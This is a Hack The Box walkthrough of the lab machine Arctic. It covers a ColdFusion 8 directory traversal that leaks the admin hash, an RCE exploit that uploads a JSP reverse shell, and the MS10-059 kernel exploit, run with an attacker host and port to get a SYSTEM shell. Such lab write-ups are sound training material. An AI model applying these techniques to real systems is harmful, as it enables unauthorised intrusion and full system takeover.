Hack The Box — Arctic

Arctic is a medium rated windows machibe on Hack The Box and also OSCP like.We get admin password using Directory Traversal on ColdFusion and then get a shell through a RCE exploit.Finally we privilege escalate using a kernel exploit.

ENUMERATION

Port 135,8500,49154 are open. Port 8500 seems to run fmtp(Flight Message Transfer Protocol). When we visit port 8500 on browser, we find two directories and within them we find many files but nothing too useful.

We also find a admin login page and it seems to run ColdFusion 8

After searching for ColdFusion 8 on google we find many exploits for Remote code execution and file upload.One more exploit we find is this Directory Traversal exploit.If you read the first few lines, it clearly gives the url path we need to visit to read some sensitive info.

Visit the url accordingly and you will get the hashed password on the admin panel.

However it is hashed and we need to crack it.For that i used crackstation.DO note that we can also login with the hashed password through burpsuite by passing the hashed password in the password field(for more info about this, refer Rana Khalil’s Arctic Writeup)

And the password is happyday , lets log in. From here i tried to look for a way to upload a reverse shell.For this application, we need to upload a .jsp shell.For uploading manually, there is a opton called “Scheduled Tasks” however i skipped the mannual way as it seemed complex and looked for an exploit instead.

I found a RCE exploit(CVE 2009–2265)

You can also find a python alternative on github-https://github.com/zaphoxx/zaphoxx-coldfusion

The usage is also pretty simple

we make a shell.jsp file using msfvenom and ran the exploit

Now all you have to do is start a netcat listener and visit /userfiles/file/3axq67.jsp which will execute the jsp reverse shell file

AND WE GOT A USER SHELL!!!

PRIVILEGE ESCALATION

We run systeminfo command to find information about our target build and architecture which is x64

We run whoami /priv to see our privileges and i can already see that this machine is vulnerable to juicy potato exploit.I wont use it here,You can refer to another writeup of mine where i have used it-https://sparshjazz.medium.com/tryhackme-retro-866de1e4242a

I will instead go with Kernel Exploit. TO do so, just save the output of systeminfo command in a text file and in your kali run the windows exploit suggester tool.

We go with MS10–059 you can always try all other kernel exploits as well to see if it works.If we google it, we find a pre comiled exploit for MS10–059 on github-https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled

DO NOTE that it can be risky to run pre compiled exploits in your machine however i am running it on my kali machine in vmware also the SecWiki github repo is trusted and popular so there are no worries.

Download the exploit and transfer it to the target using smbserver.DO NOTE that in my case, none other ways to transfer files to the target machine worked like certutil or powershell.Only smbserver worked.

in your kali start smbserver.py

and download the exploit in your windows using the copy command

On the github repo of the exploit, i found a screenshot which showed the usage as — Chimichurri.exe <LHOST> <LPORT> and we catch the connection using netcat(as shown below)

SO finally lets run it !!!

And we get a shell as NT AUTHORITY\SYSTEM !!!

we are admin !

I hope you learned from this writeup.Make sure you follow me here on medium for more such writeups of oscp like machines and articles.Until next time- ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Blackness is political….

MoonWilly is Taking Over

Fuck Medium

040/100 IT IS OKAY TO REJECT SOME WORK

A Dandelion’s Advice to the Newly Divorced

TUES. BOOK REVIEW

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Chatterbox

TryHackme: Overpass by NinjaJc01

TryHackMe — Year of the Rabbit Write-Up

Beep HTB Writeup